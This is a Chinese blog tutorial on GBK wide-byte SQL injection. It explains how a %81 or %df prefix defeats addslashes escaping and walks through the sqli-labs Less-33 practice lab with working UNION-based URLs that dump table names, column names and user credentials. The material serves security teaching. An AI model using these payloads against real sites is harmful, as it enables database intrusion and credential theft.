宽字节注入分析

已于 2022-09-12 23:16:48 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: web 文章标签: 安全
于 2022-09-11 23:39:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39511050/article/details/126800456
版权

窄字节

当某字符的大小为一个字节时,称为窄字节

宽字节

当某字符的大小为两个字节时,成为宽字节

宽字节注入

原理:宽字节注入发送的位置就是PHP发送请求到MYSQL时字符集使用charater_set_client设置一次编码。在使用PHP连接Mysql的时候,当设置"character_set_client=gbk"时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入。
(一句话:中英文所占字符不同且数据库编码与PHP编码设置为不同而导致的)

宽字节注入的条件

  1. 数据库为GBK编码
  2. 使用了转义函数,将、POGETST、cookie传递的参数进行过滤,将单引号、双引号、null等敏感字符用转义符\进行转义

宽字节注入方式

root %81' or 1=1 #

原理:在GBK编码中,反斜杠的编码是%5c,在输入%81后,使得添加反斜杠后形成%81%5c%27,而%81%5c是汉字,就类似%df%5c是繁体字"連"一样,这样单引号成功的独立的显示出来了

备注:宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象。只要输入数据的ascii码值大于128才会认为两个字符是汉字,根据参数对照表分析只要输入的内容大于或者等于%81就可以实现
ascii码编码对照表

例题:

sqli-labs 33 使用了addSlashes()函数
url路径为:http://192.168.101.101/Less-33/

在这里插入图片描述当输入http://192.168.101.101/Less-33/?id=1’
(函数addSlashes把’转移成了\')

在这里插入图片描述

http://192.168.101.101/Less-33/?id=1%81%27

在这里插入图片描述
因为sql语句中’没有被结束所以报错了,注释掉后续代码试试看
在这里插入图片描述
爆数据库表名
http://192.168.101.101/Less-33/?id=-1%81%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+
在这里插入图片描述
爆表的字段名
http://192.168.101.101/Less-33/?id=-1%81%27 union select 1,2,group_concat(column_name) from%20information_schema.columns where table_name=0x7573657273–+
这里的table_name就不能使用单引号了,要用users的十六进制
在这里插入图片描述
爆表的内容
http://192.168.101.101/Less-33/?id=-1%81%27 union select 1,group_concat(username) ,group_concat(password) from users–+
在这里插入图片描述

火腿肠
关注
专栏目录
SQL注入宽字节注入
qq_45557130的博客
10-09 412
sql注入宽字节注入
宽字节注入
weixin_45634365的博客
02-28 546
一、魔术引号 有攻击必有防御 魔术引号属于SQL注入的防御,是PHP的一种防御手段,使用反斜线将单引号、双引号以及反斜线本身进行转义 单引号和双引号内的一切都是字符串,如果我们输入的东西不能闭合掉单引号和双引号,我们的输入就不会当作代码执行,就无法产生SQL注入 ' -> \' " -> \" \ -> \\ 魔术引号防护很常见,虽然魔术引号在PHP5.3.0后就被废除,5.4.0后就被移除,但是一般的CMS全部都有使用,有专门的魔术引号函数 魔术引号在低版本中默认开启,打开php.in
宽字节注入详解
weixin_34092455的博客
08-29 664
http://netsecurity.51cto.com/art/201404/435074.htm科普:宽字节注入详解在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。作者:lxsec来源:网络安全...
sql注入之宽字节注入
最新发布
weixin_45653478的博客
04-09 656
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
CTF从入门到提升之宽字节注入
anquanniu的博客
08-15 1461
CTF入门到放弃 为什么说是从入门到放弃呢?(开个玩笑)如果说大家对CTF有了解的话,其实应该知道CTF是一个什么类型的比赛,这个比赛涉及的范围和影响有多大。如果说你真的想打好比赛,那也是真的非常不容易的,所以说这是非常困难的一件事情,初期可能学着学着就想放弃了,所以我就以这个来作为一个标题,当然本意不是让大家去放弃,就是为了让大家入个门然后再提升! 我会和我朋友一起来完成这门课程的讲解。 课程主...
SQL注入进阶之1宽字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4514
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是宽字节注入。 原理讲解 接下来的讲解,将以问...
Sql漏洞注入之宽字节注入
Matheus的博客
07-30 597
绕过–宽字节注入攻击 宽字节注入攻击 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca
第十九节 宽字节SQL注入-01
09-15
宽字节注入代码分析 在宽字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个宽字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
SQL Injection6(宽字节注入)
kid的博客
05-08 874
SQL Injection6(宽字节注入) 前言 前面sql注入时最怕碰到的就是字符型注入,然后’被过滤,反正当时时没有什么办法解决,但宽字节注入给这样的情况带来了希望 宽字节注入原理 首先是编码,之所以产生宽字节注入,就是因为有不同的编码方式 因为php后端会对我们的输入进行转义,转义的方式通常是加上’\’, 比如 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串(预定义字符...
浅谈“宽字节注入
→_→
05-19 361
漏洞名称: 宽字节注入 描述: 宽字节注入是相对于单字节注入而言的,该注入跟HTML页面编码无关,宽字节注入常见于mysql中,GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,当%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ = %df%5..
SQL注入--宽字节注入
weixin_44940180的博客
08-04 776
什么是宽字节 当某字符的大小为一个字节时,称其字符为窄字节 当某字符的大小为两个字节时,称其字符为宽字节 所有英文默认占一个字节,汉字占两个字节 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 使用宽字节注入的前提 数据库使用了gbk编码 使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号
SQL注入之宽字节注入
m0_46467017的博客
08-09 1498
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,则称为宽字节。像等这些编码都是常说的宽字节,也就是只有两个字节。英文默认占一个字节,中午占两个字节。原理:宽字节注入发送的位置就是PHP发送请求到MYSQL时字符集使用设置一次编码。在使用PHP连接Mysql的时候,当设置时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入。...
sql注入之——宽字节注入方法
wsnbbz的博客
02-11 792
使用条件 有自动转义函数或全局变量(转义字符串中的特殊字符 '或"或) addslashes() mysqli_real_escape_string() mysql_escape_string() magic_quotes_gpc 绕过 1.数值型 变量没有被符号包裹 可直接注入:$id=1 and1=1 2.使用了gbk编码可以使用宽字节绕过 原理:国标gbk编码中,汉字两个字节,英文、特殊字...
宽字节注入原理及利用
weixin_30477797的博客
08-24 1108
概念 单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码。 多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 两位的多字节字符有一个前导字节和尾字节。 在某个多字节字符集内,前导字节位于某个特定范围内,尾字节也一样。 UTF-8 编码: 是一种编码的编码方式(多字节编码),它可以使用1~4个字节表示一个符号,...
web安全 宽字节注入、堆叠注入
m0_68167825的博客
06-13 795
宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义;宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且
Sqlmap系统参数01:宽字节注入与编码技巧
接着,深入剖析了宽字节注入的一个具体案例——Sqli-Less32代码分析。这个例子展示了如何利用mysql_real_escape_string()或addslashes()这样的函数进行防御,它们的功能相似,都是对用户输入进行转义以防止SQL注入。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值